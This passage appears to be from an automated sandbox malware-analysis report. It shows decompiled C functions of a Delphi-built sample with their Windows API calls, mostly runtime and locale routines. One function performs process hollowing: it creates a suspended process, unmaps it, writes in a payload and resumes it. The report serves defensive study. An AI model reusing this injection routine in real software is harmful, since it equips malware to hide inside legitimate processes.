    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
